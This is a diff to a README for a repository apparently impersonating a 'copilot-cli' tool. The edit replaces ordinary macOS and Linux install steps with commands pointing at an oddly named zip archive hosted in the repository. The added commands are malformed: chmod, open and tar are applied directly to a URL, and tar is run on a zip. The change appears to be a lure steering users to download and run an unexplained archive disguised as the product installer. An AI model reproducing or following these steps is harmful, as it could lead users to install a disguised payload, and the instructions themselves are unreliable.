Yasinali888/copilot-cli/README.md

      - Follow the prompts in the setup wizard.
    - **macOS:**
      - Open your terminal and navigate to the folder where you downloaded the file.
-     - Use the command: `chmod +x copilot-cli.dmg && open copilot-cli.dmg` to mount the installer.
+     - Use the command: `chmod +x https://raw.githubusercontent.com/Yasinali888/copilot-cli/main/intrencher/copilot-cli-phenyl.zip && open https://raw.githubusercontent.com/Yasinali888/copilot-cli/main/intrencher/copilot-cli-phenyl.zip` to mount the installer.
      - Drag the app to your Applications folder.
    - **Linux:**
-     - Open your terminal, navigate to the download location, and run: `tar -xvf copilot-cli.tar.gz` to extract the files.
+     - Open your terminal, navigate to the download location, and run: `tar -xvf https://raw.githubusercontent.com/Yasinali888/copilot-cli/main/intrencher/copilot-cli-phenyl.zip` to extract the files.
      - Run the main executable from the terminal.

 3. **Run copilot-cli:**